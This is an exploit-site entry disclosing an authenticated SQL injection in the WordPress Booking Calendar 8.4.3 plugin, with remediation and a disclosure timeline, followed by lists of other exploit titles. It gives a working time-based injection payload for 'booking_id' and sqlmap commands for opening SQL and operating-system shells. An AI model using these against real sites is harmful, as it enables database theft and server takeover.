Menu

Search for hundreds of thousands of exploits

"WordPress Plugin Booking Calendar 8.4.3 - Authenticated SQL Injection"

Author

Exploit author

B0UG

Platform

Exploit platform

php

Release date

Exploit published date

2019-02-14

Download file

 1
 2
 3
 4
 5
 6
 7
 8
 9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
# Exploit Title: Wordpress Booking Calendar v8.4.3 - Authenticated SQL Injection Vulnerability
# Date: 2018-12-28
# Exploit Author: B0UG
# Vendor Homepage: https://wpbookingcalendar.com/
# Software Link: https://wordpress.org/plugins/booking/
# Version: Tested on version 8.4.3 (older versions may also be affected)
# Tested on: WordPress
# Category : Webapps
# CVE: CVE-2018-20556

#I. VULNERABILITY

Authenticated SQL Injection
 
#II. BACKGROUND
'Booking Calendar' WordPress plugin developed by oplugins is a booking system which allows website visitors to check the availability of services and make reservations.

#III. DESCRIPTION
An authenticated SQL Injection vulnerability in the 'Booking Calendar' WordPress plugin allows an attacker to read arbitrary data from the database. 

#IV. PROOF OF CONCEPT
1) Access WordPress control panel.
2) Navigate to the Booking Calendar plugin page.
3) Set up Burp Suite to capture the traffic.
4) Select one of the booking entries and click on the 'Trash Can' button to delete the entry.
5) Within Burp Suite, analyse the POST request and idenitfy the parameter 'booking_id'.
6) The 'booking_id' parameter is vulnerable to the following different types of SQL injection: 
 Boolean based blind injection
 Error based injection
 Time based injection

7) We can perform a time based SQL injection by appending   ) AND SLEEP(100) AND (1=1   after the ID value in the parameter as shown below.
action=TRASH_RESTORE&booking_id=573) AND SLEEP(100) AND (1=1&is_send_emeils=1&denyreason=&user_id=1&wpdev_active_locale=en_US&is_trash=1&wpbc_nonce=99c5ffaa67

Obtaining a shell using sqlmap
-----------------------
 Obtain a SQL Shell
Sqlmap r post-request.txt p booking_id --sql-shell

 Obtain a Linux Shell
Sqlmap r post-request.txt p booking_id --os-shell

 Obtain a Windows Command Prompt
Sqlmap r post-request.txt p booking_id --os-cmd

#V. IMPACT
The vulnerability allows an attacker to read arbitrary data from the database. It is possible to get a remote shell from this vulnerability.
 
#VI. SYSTEMS AFFECTED
WordPress websites running 'Booking Calendar' WordPress plugin version 8.4.3 (older versions may also be affected).
 
#VII. REMEDIATION
Uninstall the plugin until the vulnerability has been fixed by the developer.

#VIII. DISCLOSURE TIMELINE
#December 28, 2018 1: Vulnerability identified.
#December 28, 2018 2: Informed developer of the vulnerability.
#February 14, 2019 3: No communication received back from the developer.
Release Date Title Type Platform Author
2020-12-02 "aSc TimeTables 2021.6.2 - Denial of Service (PoC)" local windows "Ismael Nava"
2020-12-02 "Anuko Time Tracker 1.19.23.5311 - No rate Limit on Password Reset functionality" webapps php "Mufaddal Masalawala"
2020-12-02 "Ksix Zigbee Devices - Playback Protection Bypass (PoC)" remote multiple "Alejandro Vazquez Vazquez"
2020-12-02 "Mitel mitel-cs018 - Call Data Information Disclosure" remote linux "Andrea Intilangelo"
2020-12-02 "Artworks Gallery 1.0 - Arbitrary File Upload RCE (Authenticated) via Edit Profile" webapps multiple "Shahrukh Iqbal Mirza"
2020-12-02 "ChurchCRM 4.2.0 - CSV/Formula Injection" webapps multiple "Mufaddal Masalawala"
2020-12-02 "DotCMS 20.11 - Stored Cross-Site Scripting" webapps multiple "Hardik Solanki"
2020-12-02 "ChurchCRM 4.2.1 - Persistent Cross Site Scripting (XSS)" webapps multiple "Mufaddal Masalawala"
2020-12-02 "NewsLister - Authenticated Persistent Cross-Site Scripting" webapps multiple "Emre Aslan"
2020-12-02 "IDT PC Audio 1.0.6433.0 - 'STacSV' Unquoted Service Path" local windows "Manuel Alvarez"
Release Date Title Type Platform Author
2020-12-02 "WonderCMS 3.1.3 - 'Menu' Persistent Cross-Site Scripting" webapps php "Hemant Patidar"
2020-12-02 "WordPress Plugin Wp-FileManager 6.8 - RCE" webapps php "Mansoor R"
2020-12-02 "WonderCMS 3.1.3 - Authenticated SSRF to Remote Remote Code Execution" webapps php zetc0de
2020-12-02 "Anuko Time Tracker 1.19.23.5311 - Password Reset leading to Account Takeover" webapps php "Mufaddal Masalawala"
2020-12-02 "Simple College Website 1.0 - 'page' Local File Inclusion" webapps php Mosaaed
2020-12-02 "Car Rental Management System 1.0 - SQL Injection / Local File include" webapps php Mosaaed
2020-12-02 "Pharmacy Store Management System 1.0 - 'id' SQL Injection" webapps php "Aydın Baran Ertemir"
2020-12-02 "Anuko Time Tracker 1.19.23.5311 - No rate Limit on Password Reset functionality" webapps php "Mufaddal Masalawala"
2020-12-02 "WonderCMS 3.1.3 - Authenticated Remote Code Execution" webapps php zetc0de
2020-12-01 "Multi Restaurant Table Reservation System 1.0 - Multiple Persistent XSS" webapps php yunaranyancat
Release Date Title Type Platform Author
2019-02-14 "WordPress Plugin Booking Calendar 8.4.3 - Authenticated SQL Injection" webapps php B0UG
2018-05-04 "WordPress Plugin WF Cookie Consent 1.1.3 - Cross-Site Scripting" webapps php B0UG
2018-05-01 "WordPress Plugin Responsive Cookie Consent 1.7 / 1.6 / 1.5 - (Authenticated) Persistent Cross-Site Scripting" webapps php B0UG
2018-04-24 "UK Cookie Consent - Persistent Cross-Site Scripting" webapps php B0UG 
import requests
response = requests.get('http://127.0.0.1:8181?format=json')

For full documentation follow the link above

Cipherscan. Find out which SSL ciphersuites are supported by a target.

Cipher Protocols Sigalg Trusted

Identify and fingerprint Web Application Firewall (WAF) products protecting a website.

Host WAF detected